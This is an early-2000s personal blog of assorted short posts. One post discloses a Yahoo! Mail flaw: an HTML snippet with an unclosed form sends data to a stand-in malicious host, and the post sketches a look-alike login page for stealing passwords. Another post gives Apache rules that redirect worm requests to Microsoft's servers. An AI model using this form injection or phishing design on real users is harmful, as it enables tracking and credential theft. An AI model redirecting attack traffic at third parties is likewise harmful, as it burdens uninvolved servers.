I have yet another Random Link link to share with you: AltaVista Random Image Link, which actually seems to link to a page containing an image in their image database.  I found this, believe it or not, because someone used it to hit my site.  This is perhaps the least interesting of the random link URLs I have found.

Granite Canyon, the free DNS provider I have been using for a couple of years, has been having some serious problems lately.  My sites were out for a couple of days because their servers were down.  I believe they are still down, but it’s no longer relevant as I have changed my DNS provider to (the still free) XName.  They seem to be more solid.  Let me know if you have trouble accessing my sites.  Also, if you sent me mail in the past couple of days, you may need to resend it.

Purchase Neal Stephenson’s Snow Crash or The Diamond Age from Fictionwise by credit card, and get a 100% Micropay rebate, good for anything they sell.  Offer good through September 8th.

127 mph over the speed limit?  Who knew radar guns went up that high?

It is, right now, only US$36 more to fly from Los Angeles to London than it is to fly from Los Angeles to Boston.  Sure, that makes sense.

Two new fun scripts to play with.  The first decorates text with all sorts of diacritics, and was inspired by Jordon Kalilich of The World of Stuff.

The second needs a bit more explanation.  There is a site called TinyURL that shortens long URLs for inclusion, for instance, in emails.  Unlike other services such as Make A Shorter Link, however, TinyURL assigns its shortened URLs sequentially, meaning that you can see what pages other people have been visiting.  The script I wrote brings up a [Random TinyURL] page (drag that previous link to your links bar for convenience.  If your web browser caches the results of the script, giving you the same page every time, drag this link [Random TinyURL] to your links bar.  In the latter I’m using the random() function to generate a new URL for each request, to sidestep caching.)

My script is better than the two other scripts I found on the web that claim to do this: one only looks at pages through AZZZ, about ten percent of the total available, the other looks at all pages of the form XXXX, most of which haven’t been assigned yet.  If you find any startlingly good (or just startling) links through this script, feel free to post them here.

Warning: The resulting page may be anything found on the internet, and therefore may, of course, not be appropriate for all viewers (http://tinyurl.com/lnbz, for instance, to cite an especially pronounced example.) Viewer-discretion-own-risk-etc.

I’m trying out a new feature on this site, a contest.  If successful I’ll make it a monthly feature.  Win a US$5 bill by answering the following question correctly:  In what field of study would you encounter the following expression, and what (roughly) does it express?  You will need a non-text-based browser to view it properly.

π⁴*²A⁴B-C⁴ (C₃+Χ²) D-G⁴ (±G₂) H⁴ (–H_2.3,=*²)

Post your answers here or email them to me.  Winners will be announced on mcgees.org.

Alias season 1 and CSI season 2 are both released on DVD the 2nd of September (my wife is a big fan of the latter; we both like the former.)

Gernot Katzer’s Spice Dictionary is an amazing repository of information on more than 100 herbs and spices.  Should be bookmarked by every culinary enthusiast.

The number of IMDB Top 10 Films I have seen: 8 (80%)

The number of IMDB Top 100 Films I have seen: 57 (57%)

The number of IMDB Top 250 Films I have seen: 105 (42%, although I’m not sure if I finished three or four of them.)

The number of IMDB Bottom 100 Films I have seen: 11 (11%: two on Mystery Science Theater, one I stopped watching, and three [Speed 2: Cruise Control, Ballistic: Ecks vs. Sever, and Batman & Robin] that really were not that bad.)

How do you compare?  Post your answers.

Three Shots And He’s Out: “After serving just three years in prison for killing a 16-year-old, Tony Martin has been paid £125,000 for his ‘story’ by the Mirror – and this is what we call justice?”  From The Sunday Herald.

If you are at all interested in tea, read this fascinating article on Chinese teas.

You know that scene from Doctor Dolittle when Rex Harrison is reading a volume from his bookshelf, is impressed by the astuteness of the author, checks to see who it is, and discovers that he himself had written the book?

Reading at the Celtic Malts site someone is quoted as saying that the best whisky match for a deep-fried Mars bar is Loch Dhu because by doing so one “can experience two culinary abominations at the same time, with a minimum of effort.”  After chuckling, I read on and saw that the quote is attributed to me.  Well, at least I amuse myself.

I just found an exploit for Yahoo! Mail.  First, a little background:

If you receive an email with an HTML attachment, Yahoo! will give you the option to download it, but it will also render it inline, showing you the web page encoded in the attachment.  Yahoo! performs a couple of processing steps on the email to try to secure it: first, the text target=”_blank” onsubmit=”return ShowFormWarning()” is added to the <form> tag.  The target specification means that the requested page will show up in its own window and not take over your Yahoo! Mail session.  The onsubmit specification causes a pop-up dialog to appear, informing the user that he or she is about to send information to someone other than Yahoo!.  Yahoo! will also close the <form> tag if — and this is critical — it doesn’t think it has already been closed.  It apparently checks if the form is closed by searching for the text </form> after each instance of <form …>.

So here is the exploit: send an HTML attachment with </form> enclosed in a comment.  Consider the following as an example:

<form action=”http://www.malicious-site.com/track-email.cgi” method=”post”>

     <input type=”hidden” value=”Message_ID_123456_was_read_by_Joshua_McGee”>

<!– </form> –>

Here’s how it works: the Yahoo! Mail parser will check the message, find </form>, and assume everything is fine.  But now the form is not closed, so all further inputs that might be encountered are treated as belonging to malicious-site.com’s form.  This would not be a problem if Yahoo! coded their pages a little better, but two things make it a problem as it currently stands.  First, the mail page is bracketed by one big <form> tag to control the “Delete” and “Reply” (etc.) features.  Second, the “Delete” button is actually a “Submit” button for this form!

So let’s walk through an example.  I send you the malicious code above as an HTML attachment.  On the page that displays the email, Yahoo! opens one big <form> to control “Delete” and “Reply” functionality.  It renders the malicous code inline, so my code starts an (invisible!) form and inserts an (invisible!) tracking code.  I “end” my <form> tag with a </form> tag embedded in a comment.  Yahoo! checks to see if I have closed my nested <form>, wrongly determines that I have, and doesn’t add a </form> tag for me.  The next <input> encountered is the “Delete” button, which is really a “Submit” button.  But since the malicious <form> was never closed, it is a “Submit” button for the malicious <form>.  So when the user clicks the “Delete” button, expecting to have the message deleted, it instead sends the tracking ID to the malicious site.

“Now wait,” you’re thinking, if you are not totally lost already.  “This will trigger the ShowFormWarning() function.”  True.  But what’s the naïve user to think?  They are clicking a Yahoo! button, so how could it not be safe?  My guess is many users would just ignore the message.

I’m sure you could do more clever things: it might be possible to use Javascript to populate the invisible form with system data, for instance.  Or maybe the target url is a clone of the “Your session has expired, login again” screen.  You could even set the form action url to something like http://login.yahoo10.com/config/mail?.intl=us&.lg=us, assuming you owned yahoo10.com (it’s available.)  When the form data is submitted, then, a Yahoo!-looking window would pop up with a Yahoo!-looking URL asking for the user’s password.  Don’t you figure most people would enter it?  The malicious site now has your email address and password.  Then all the site would have to do, so as not to arouse suspicion, is bring up a Yahoo!-looking page that says “Invalid password”, but on this one have the form correctly set to send the data to Yahoo!.  Voila.

I’ve reported this bug to Yahoo!.

It looks like my Postal Cancel Art page got written up in the Wikipedia under the entry for Cancellation.  The link text is “Some people attempt to use stamps relating to the theme of a pictorial cancellation on the envelope.”  Very cool.  Thanks, anonymous wiki contributor!

(Note added 07 May 2004: Oh, right, OK.  Now that I know more about how to use Wikipedia, I can see that it wasn’t an anonymous contributor, it was surrealist painter and mail artist Daniel C. Boyer who heads the The International Union of Mail-Artists.  Weird that I’m on their radar screen.  I’m going to have to learn more about the movement.)

Here’s an aerial picture of my house.  My neighborhood, anyway.

Well, I’ve finally done it.  I’ve signed up to begin the sailing courses with Marina Sailing that Jenn gave me for Christmas (thanks Jenn!)  I am terrifically excited.  After I finish the Complete Sailing Course I will have had 21 hours of on-the-water instruction, three hours of classroom instruction, lots of home study, and will have received ASA Basic (101) and Coastal Cruising (103) certification, allowing me to charter boats.

They are sponsoring a photo contest right now.  The following are my favorites.  Click the pictures for larger versions.

Seagull Chicks

Sea Lion on a Rock

The inmates of Camp X-Ray will not appreciate the comparison, but there is a large slice of Alice in Wonderland about their predicament.  It is not just that they have fallen down a rabbit hole of their own making, where they find themselves held in conditions which breach the Geneva Convention’s recommendations for the treatment of prisoners-of-war.  What brings an even more bizarre touch to their fate is Bush’s decision to mount a kind of show trial for six of their number before a specially convened military tribunal.

Read more.

It just ocurred to me, completely out of the blue and in a silent office, that the title of the musical Rent has a double meaning: the fee to occupy a space, yes, but also “torn apart”, a commentary on the anguish and unsettledness of the characters.  It’s been years since I’ve seen this play and a long time since I’ve heard anything from it, so I have no idea why this popped into my head.  I went to Google and searched for the text, and found that this is obvious, I had just completely missed it:

How do you leave the past behind

When it keeps finding ways to get to your heart

It reaches way down deep and tears you inside out

Till you’re torn apart

Rent

As usual, I will quote from Michael Quinion’s irreplaceable World Wide Words column, this time from issue 348 (Saturday 5 July 2003):

“English, whatever its other merits, has as many disparaging words
as one would possibly desire. The example that follows is from Sir
Thomas Urquhart’s 1653 translation of Rabelais’ work Gargantua and
Pantagruel, a translation that draws heavily on vocabulary used in
Scotland in his [Urquhart's] time:

“The bun-sellers or cake-makers were in nothing inclinable
to their request; but, which was worse, did injure them
most outrageously, called them prattling gabblers, lickorous
gluttons, freckled bittors, mangy rascals, shite-a-bed
scoundrels, drunken roysters, sly knaves, drowsy loiterers,
slapsauce fellows, slabberdegullion druggels, lubberly louts,
cozening foxes, ruffian rogues, paltry customers, sycophant-varlets, drawlatch hoydens, flouting milksops, jeering
companions, staring clowns, forlorn snakes, ninny lobcocks,
scurvy sneaksbies, fondling fops, base loons, saucy coxcombs,
idle lusks, scoffing braggarts, noddy meacocks, blockish
grutnols, doddipol-joltheads, jobbernol goosecaps, foolish
loggerheads, flutch calf-lollies, grouthead gnat-snappers,
lob-dotterels, gaping changelings, codshead loobies, woodcock
slangams, ninny-hammer flycatchers, noddypeak simpletons,
turdy gut, shitten shepherds, and other suchlike defamatory
epithets; saying further, that it was not for them to eat
of these dainty cakes, but might very well content themselves
with the coarse unranged bread, or to eat of the great brown
household loaf.”

Have fun working all of these into casual sentences, or just tracking down the meanings of all these insults.  I’ll get you started: a  sychophant-varlet is a servile, flattering servant or rascal.  A blockish grutnol is a dull, lazy person.&nbp; A woodcock slangam is a lanky person as dim-witted as a pheasant (Google for slangam and you encounter a fascinating academic paper entitled A cultural-linguistic study of English sound-symbolic pejorative lexemes beginning in sl- and du-.  As long as you have your dictionary out already, it’s worth a read: just look for definitions that begin ‘Ling. -‘.)  A doddipol-jolthead seems to be a blockhead-blockhead, which suggests that there has been a great deal of linguistic compression of various insults into fewer terms.  I have the misfortune of encountering quite a few drunken roysters (revelers), drowsy loiterers, and jeering companions, and I am commonly treated as a paltry customer, although less frequently since the local Wherehouse Music stores have closed.  I have been mostly able to avoid staring clowns and forlorn snakes.  Just apply some effort: I’m sure you can work shite-a-bed scoundrel into today’s conversations with minimal effort.

The source work for these words, Gargantua and Pantagruel, inspired the English word Gargantuan, which is defined by one source as “Characteristic of Gargantua, a gigantic, wonderful personage; enormous; prodigious; inordinate.”  The author, François Rabelais (1494-1553), has also given rise to an English word, Rabelaisian, used to describe wildly obscene humor (take, for instance, Gargantua’s discussion of how best to wipe one’s arse, the final decision being the neck of a live goose, leading me to wonder if a few centuries will turn South Park into fine literature.)  If this is intriguing to you, BookFinder lists a range of copies of Gargantua, from a $0.50 Penguin mass market paperback to a charming 1708 octavo edition, containing the translation above, in calfskin with gilt lettering for £1100 (about $1800.)  If you beat me to it you can have a $50 limited edition on hand-made paper; I’m checking to see if it contains Urquhart’s translation.

When the Code Red worm attacks, it tries to access the file default.ida to propagate itself across Microsoft IIS servers.  The Nimda worm does the same thing, except it tries to access root.exe and/or cmd.exe.  My server, running Apache, is immune to these exploits, but my site returns a 404 page in response and consumes my bandwidth in the process.  I could create an empty file and redirect all results to this file, but I get a deeper, more smug satisfaction by sending these requests on to Microsoft.  Let the worm eat up their bandwidth; it’s their sloppy programming that caused the problem in the first place.

To do the same thing yourself, add the following RewriteRules to your httpd.conf file:

RewriteRule     ^(.*default\.ida.*)$    http://www.microsoft.com$1 [R]

RewriteRule     ^(.*root\.exe.*)$       http://www.microsoft.com$1 [R]

RewriteRule     ^(.*cmd\.exe.*)$        http://www.microsoft.com$1 [R]

For more information on using RewriteRules, consult the Apache documentation.

(I have no idea if the worms actually go to the redirected URLs.  Anyone know?)

Newspapers have been having fun with the name of the Web site set
up by the British energy firm PowerGen, which is investing in Italy
and has created the wonderful www.powergenitalia.com (it is a real
Web site, I can confirm, though not always easy to access).  But you
might prefer instead www.crotch-partnership.co.uk, which isn’t what
you’re thinking it is, unless you know it’s a firm of solicitors in
Norwich.  Another odd one is http://www.whorepresents.com, at which
you can find an actor’s representative.

                                - Michael Quinion, World Wide Words, Issue 347 (Saturday 28 June 2003)

Note added 09 July 2003: Michael Quinion has issued a correction to this bulletin, as has a mcgees.org reader.  PowerGen has nothing to do with the powergenitalia site, which is rather associated with an Italian firm selling specialized battery products.  More information at Snopes.

According to the gigantic word list from Orchy and a Perl script I wrote, the following are the 48 letter pairs that never show up in English words:

bq, cj, cv, cx, fq, fv, fx, gq, gx, hx, jb, jf, jg, jh, jq, jt, jw, jx, jy, jz, kq, kz, px, qc, qf, qg, qh, qj, qk, qm, qn, qp, qq, qv, qx, qy, qz, vb, vj, vq, vw, vx, wq, xj, xk, xz, zf, zx

Note, however, that several of these are common abbreviations (CV for “Curriculum Vitae”, FX for “effects”, GQ for “Gentleman’s Quarterly”, VB for “Visual Basic”, VW for “Volkswagen”, etc.) and others show up in proper nouns and radio station callsigns.

Anyone read Dutch?  Can you tell me what they are saying about my hamster photo on this page?  Scroll down and look for the picture to the right.

Note added 18 Jun 2003: OK, I heard back from the author of the hamster post.  Apparently she was saying the hamsters are ‘zielig’ — ‘miserable’ or ‘pitiful’.  I think it is because there are several in the same cage.  And she is right!  But in my defense, shortly after the picture was taken I moved the hamsters to individual, much larger habitats.  Chronologically, here are the posts about hamsters: [1], [2], [3], [4], [5], [6], and [7].  The last link is about the hamsters’ deaths.  Note also that “eulogies for hamsters” was one of the searches in my Two Years of Google Searches.

If anyone out there speaks Dutch, I would still like a summary of what was said in the thread.

If you don’t know already, you should probably be told that one of the pieces of information passed by most browsers to a server is the address of the page with the link that got you there.  This is called the “Referrer”.  I have two years of mcgees.org server logs at my disposal, and was able to run a search for all the Google queries that people used to reach my site.  I have posted a page containing all the search queries.  It’s quite large, so you’ll have to wait a few moments for it to download.

Many are quite amusing, some are frightening (consider the ten searchers looking for rape images), others are downright bizarre.  You have to wonder about a search for bitmap images of badgers, or calculus project “differential equations” “dr. jekyll”, or coca cola kidney stone cure, or essential tremor bicycle, or (what could this even mean?) notebook fall asleep even typing linux.  There is the poor sod who didn’t know that Google limits your searches to ten words, and searched for cheat codes how you can get the star and the shoes and how to get into unlocked door you get from nana luigis mansion, which must relate to some video game (Any insight, Dave?)  And there is the amusingly phrased ill cheat codes for tony hawk playstation.

Then there are the people who must think the computer is psychic.  There is the person who searched for what do i do if my printer will not pick up paper, makes a grinding noise, panel lights blink, and the person who looked for pictures of rachel a girl who died from heroin a few weeks ago.  I was also introduced to the search word “fakes”, wherein the search consists of, say, Jennifer Garner fakes.  Judging by the fact that all of the people searched for are well-known and at least reasonably attractive female entertainers, I gather that “fakes” must be faked — what? — nudie pictures?  Pornographic photographs?  In addition to Garner, people looked for Alicia Keyes, Amy Brenneman, Callista Flockhart, Mariah Carrey (and Carry, but not Carey), Sarah Michelle Gellar, Jane Kaczmarek, Lucy Liu, Sarah Jessica Parker, Sela Ward, and Sheryl Crow.  (Now I’m going to get all sorts of Google hits to this page from people looking for “fakes”.  So let me take a moment to say to them, “Fellows, get a life.”  And I’m going to get blocked by content filters.  Since their users will never see this, it would be pointless to tell them to get a life.)

Feel free to peruse the list yourself and see if you find any more gems.

The Smoking Gun prepared a FOIA request for complaints and injury reports by workers and guests at the Los Angeles Zoo.  My favorite is a worker’s injury report:

I was scratching the male maned wolfs [sic] shoulders through the chain link fence when he turned suddenly [and] bit my left hand”

The supervisor, quite reasonably to this reader, responded as follows:

Keeper should never have put fingers into animal area — she is experienced enough to know this.  More safety talks cannot replace common sense.

Tennessee is scheduled to execute Abu-Ali Abdur’Rahman June 18 for the 1986 murder of Patrick Daniels in Davidson County.  Abdur’Rahman, an African American male, received exceptionally poor legal representation at his trial, and problems concerning possible innocence, mental illness, prosecutorial misconduct, and racial discrimination continue to surround his death sentence.

At the sentencing phase of Abdur’Rahman’s trial, his attorneys failed to present available mitigating evidence, namely the violent abuse he suffered as a child, which likely would have changed the jury’s sentencing decision.  His father beat him with a baseball bat, and used various forms of torture as disciplinary tactics.  These included stripping the young boy and tying him up, locking him in a cupboard, and forcing him to eat a pack of cigarettes.  When Abdur’Rahman vomited after eating the cigarettes, his father made him eat the vomit.  As a result of his upbringing, Abdur’Rahman developed Post-Traumatic Stress Disorder (PTSD), and he has shown serious symptoms of mental illness, including Dissociative Disorder.  During the appeals process, eight of the jurors who sentenced him to death expressed doubts over whether they would have voted for the death penalty if the defense had presented any or all of the available mitigating evidence at trial.

Furthermore, there is strong reason to believe that Abdur’Rahman, although present at the crime scene, was not the assailant in the murder for which he was sentenced to death.

Take Action.

The PowellsBooks newsletter has a bizarre and addictive feature called, and I’m quoting this literally, “Fup. Store Cat.”  Yes, the periods included.  As far as I can gather, Fup is the name of their store cat; that’s a picture to the right.  “Fup. Store Cat.” is like a train wreck: you can’t quite pull your eyes away, even if you want to.  You see, every newsletter presents a new “chapter” (just a couple hundred words) about Fup’s adventures.  In each chapter Fup, joined by compatriots Bear, Zooey, and Wiggums, adventure their way through unwieldy prose:

Let’s follow a path in the sun,” Bear purrs.

“There are no paths in the sun,” Wiggums reminds him.  “You’re sitting in the last patch of sun we’re liable to find for three days.”

Up and up the fir trees go, so far beyond the leafy pockets nearer to the ground that there’s no telling where they stop. Their tops end somewhere in the sky, is about all you can safely say.

“We could climb until we’re above the tree line,” Fup suggests, “but that would be an odd thing to do, seeing as it’s trees we’re looking for.”

“Trees you’re looking for?” someone says.

Fup looks at Bear.  Then Fup and Bear both look at Wiggums.  An echo would be the most natural explanation, except that they hadn’t noticed an echo before.

Fup repeats herself, but a little louder this time: “Trees we’re looking for.”

“That’s what I thought you said.”

Down by the creek, Zooey begins to growl.

They search the woods around them, but it’s like trying to find fish in a deep lake, Fup realizes, staring into the tangle of leaves and branches.  She notices for the first time how loud the bird chatter has become — or had she not been listening before?  She can’t see a single bird for all the leaves and branches, but suddenly birds are all she can hear.

Each time the newsletter arrives, I’m presented with my WTF moment for the day.

Read about RealDriver’s amazing full-sized cab simulator of a GP-38 for use with Microsoft’s Train Simulator.  They also offer a smaller train controller for use with this software and (soon) your model train set.

New medical privacy laws have gone into effect recently.  It used to be that at my pharmacy, when one picked up a prescription, a sticker printed with your name, the date, and the medicine name was affixed to a clipboard.  A little box was provided for you to sign for receipt.  A little glance upwards was all that was required to see the names — and prescriptions — of the people in line ahead of you.  No longer is this permitted.  Likewise, at the the medical testing facility where I have gone to have blood drawn, your name and the prescribed tests were written on a sheet that anyone visiting the office could see.  This, too, is now forbidden.

The overall point — the protection of personal information — has not necessarily sunk into everyone’s heads yet.  My physician still hollers things across the office: “Could you check to see if Josh has received his second Hep B vaccine yet?”  And the techs at my pharmacy seem not to have grokked the gestalt yet.  To wit, a telephone conversation I just had:

Me:  Hi, I’m checking to see if I’ve forgotten to pick up any prescriptions.

Tech:  What’s the name?

Me:  McGee.  Joshua.

Tech:  The last thing I show is from the 19th.  Have you picked anything up since the 19th?

I suddenly wondered how much information she was ready to give out over the telephone.

Me:  Err, I don’t know, what was it I picked up on the 19th?

Tech:  No, it was a call from the 19th.  That was the Lorazepam.  Want me to check if you’ve picked it up yet?

Bingo.  That’s a psychotropic med, but they were comfortable revealing it to someone on the line who merely mentioned my name.  I was calling from work, so it’s not as if caller ID betrayed me.  And I’m sure there’s no chance she recognized my voice: that sort of service has pretty much disappeared, and I’ve only been using this pharmacy since March anyway.  I suspect I could have gotten more information from her: other meds, other dates, prescribing doctors.  Which makes one wonder, who really cares about those little stickers if I can get all of this over the telephone?  And what self-respecting private investigator would bother raiding your trash if this is all free for the asking?